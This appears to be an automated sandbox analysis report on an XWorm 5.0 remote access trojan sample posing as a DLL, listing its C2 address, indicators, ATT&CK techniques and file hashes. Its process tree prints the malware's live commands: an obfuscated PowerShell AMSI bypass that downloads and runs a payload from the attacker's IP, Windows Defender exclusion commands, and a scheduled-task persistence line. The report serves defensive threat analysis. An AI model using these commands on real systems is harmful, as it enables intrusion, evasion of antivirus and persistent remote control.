xworm | aefbc83f1cf4facc11486398011bea48b4eae99ff13bebff0981ebc837cd1ecf

Analysis

max time kernel
64s
max time network
62s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
08/03/2025, 19:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NukeCrypter/SspiCli.dll
Size

14.0MB
MD5

7697bb66b64ca30f53344f8b2a4dbd2a
SHA1

9fb9053ec18db85b9a55439b048fbbc694a1f9bb
SHA256

49861d9f7c2743bd8e7895ce173356f11474b393d9d8ecabb79b0fecc625e790
SHA512

7785d935729f342304ab87b4ea7d6050dfc76ff5e7a04123273769448a0de2e3d4c5df006136d47d6d3e476e8d23fdbb875484cd81ad29315faabe9ddea4fe79
SSDEEP

196608:y8qw4TxltmlBWDolz/tGTeyMdfkjIxj4/zHd1vqGyvnkYIiHuqZf:WxDolz/tGTeyMMIwHLiGyvnkC

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

45.137.201.27:2010

Mutex

NJSnJLx9hqfSdYjB

Attributes

Install_directory
%LocalAppData%
install_file
msedge.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral8/files/0x000300000002a2a1-30.dat	family_xworm
behavioral8/memory/4684-33-0x0000000000580000-0x00000000005AE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2844	powershell.exe
5412	powershell.exe
1100	powershell.exe
3048	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
1	5636	Powermode.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe

Executes dropped EXE 3 IoCs

pid	Process
5636	Powermode.exe
4684	msedge.exe
1072	msedge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5512	schtasks.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
5636	Powermode.exe
5636	Powermode.exe
3048	powershell.exe
3048	powershell.exe
2844	powershell.exe
2844	powershell.exe
5412	powershell.exe
5412	powershell.exe
1100	powershell.exe
1100	powershell.exe
4684	msedge.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	5636	Powermode.exe
Token: SeDebugPrivilege	4684	msedge.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	5412	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	4684	msedge.exe
Token: SeDebugPrivilege	1072	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4684	msedge.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 5676 wrote to memory of 2588	5676	rundll32.exe	81
PID 5676 wrote to memory of 2588	5676	rundll32.exe	81
PID 2588 wrote to memory of 5636	2588	cmd.exe	85
PID 2588 wrote to memory of 5636	2588	cmd.exe	85
PID 5636 wrote to memory of 4684	5636	Powermode.exe	87
PID 5636 wrote to memory of 4684	5636	Powermode.exe	87
PID 4684 wrote to memory of 3048	4684	msedge.exe	88
PID 4684 wrote to memory of 3048	4684	msedge.exe	88
PID 4684 wrote to memory of 2844	4684	msedge.exe	90
PID 4684 wrote to memory of 2844	4684	msedge.exe	90
PID 4684 wrote to memory of 5412	4684	msedge.exe	92
PID 4684 wrote to memory of 5412	4684	msedge.exe	92
PID 4684 wrote to memory of 1100	4684	msedge.exe	94
PID 4684 wrote to memory of 1100	4684	msedge.exe	94
PID 4684 wrote to memory of 5512	4684	msedge.exe	96
PID 4684 wrote to memory of 5512	4684	msedge.exe	96

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NukeCrypter\SspiCli.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:5676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\ProgramData\my_script.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\ProgramData\Powermode.exe
    Powermode.exe -w hidden -ComMand $m1='A';$m3='i';$m2='ms';$m=$m1+$m2+$m3;$a1='am';$a2='si';$a=$a1+$a2+'InitFailed';$b1='No';$b2='nPu';$b3='bli';$b4='c,St';$b5='at';$b6='ic';$b=$b1+$b2+$b3+$b4+$b5+$b6;$ex=$null;$aaa1=[Ref].Assembly.GetType('System.Management.Automation.'+$m+'Utils').GetField($a,$b);$aaa1.SetValue($ex,$true);$XZLqW6au='http://45.137.201.27:30054/msedge.exe';$output=[System.IO.Path]::Combine($env:APPDATA,'msedge.exe');[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri $XZLqW6au -OutFile $output;Start-Process -FilePath $output;exit
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5636
  - - C:\Users\Admin\AppData\Roaming\msedge.exe
      "C:\Users\Admin\AppData\Roaming\msedge.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4684
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3048
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2844
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5512

C:\Users\Admin\AppData\Local\msedge.exe
C:\Users\Admin\AppData\Local\msedge.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1072

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Powermode.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\ProgramData\my_script.bat

Filesize
729B

MD5
092cabe7fe4773b78ff62f414633572f

SHA1
c9f77f261d45e394086f7bb23eb91b80b8d0b318

SHA256
85d5ee43057001a08fa00e02a4aaf7d84a2d4407f662fa9c22b16b22a9d0738b

SHA512
e5d1b866e5a50243f953b67f191c4185aecdc828e5641cae6f78486f71f337f3efedbcb6051586b886a3c321db6fb17f9fe276cbc9954e0abb41e0813589a022

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2550655ef0d8c52e598c31b09e202a82

SHA1
f7c03f01fe2ea3340cac97a76fa428449f351255

SHA256
b16ab052e8c486fc9a0ecd10234bedc1f5d1e34cf5f99b5cfca4bd95a47c0c19

SHA512
bb773939c67b9a03c53cb83e1f9bde1a7288f15c3ccb77e29495125b669af807e6b319c17583121d09928e4579077d793812f199ba061be2eba8593e8aaa9bd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ea5a0b15a4152d282737ef33992467aa

SHA1
e9188e3a25982b1477c6cbed57b46e091f4ad70e

SHA256
8ddb2cb1482af22dff12819c55aa24d3e83dadbbc410e656b7f591422e627503

SHA512
875ef3bf42d6ffd198b00e50f1cc7d539a410a9610fe3e87a47b44d7e4eabff7907672fbc6dc63fbe941d90217de0bb47c86ef8b0a9d17c04b9fd1cd9ecf33bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
80b42fe4c6cf64624e6c31e5d7f2d3b3

SHA1
1f93e7dd83b86cb900810b7e3e43797868bf7d93

SHA256
ee20a5b38a6674366efda276dbbf0b43eb54efd282acfc1033042f6b53a80d4d

SHA512
83c1c744c15a8b427a1d3af677ec3bfd0353875a60fe886c41570981e17467ebbb59619b960ca8c5c3ab1430946b0633ea200b7e7d84ab6dca88b60c50055573

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
781da0576417bf414dc558e5a315e2be

SHA1
215451c1e370be595f1c389f587efeaa93108b4c

SHA256
41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

SHA512
24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qx1zw3x0.4sl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\msedge.exe

Filesize
165KB

MD5
22a01fdc6d06f445af5de9759799225f

SHA1
1dde5be9d7c8a7ae68332c92a6e1263f24705f7c

SHA256
682acd04365f06fd83daa81b7bbd71665a60e729d6d4ecc3693eb486b8d4a13f

SHA512
e602f9d32b78c8d317698337ea2eb02b6bbf72cae13d3a5c3e3cee39c2445a8c2d85514eb7c741125364fee2f83582ce6a41154128a6c88c257cb5e41eb8f2d6

Download Submit
memory/4684-33-0x0000000000580000-0x00000000005AE000-memory.dmp

Filesize
184KB

Download
memory/4684-81-0x0000000000E30000-0x0000000000E3C000-memory.dmp

Filesize
48KB

Download
memory/5636-34-0x00007FFFE7A00000-0x00007FFFE84C2000-memory.dmp

Filesize
10.8MB

Download
memory/5636-19-0x00007FFFE7A00000-0x00007FFFE84C2000-memory.dmp

Filesize
10.8MB

Download
memory/5636-18-0x00007FFFE7A00000-0x00007FFFE84C2000-memory.dmp

Filesize
10.8MB

Download
memory/5636-17-0x00007FFFE7A00000-0x00007FFFE84C2000-memory.dmp

Filesize
10.8MB

Download
memory/5636-16-0x0000019D71100000-0x0000019D71122000-memory.dmp

Filesize
136KB

Download
memory/5636-7-0x00007FFFE7A03000-0x00007FFFE7A05000-memory.dmp

Filesize
8KB

Download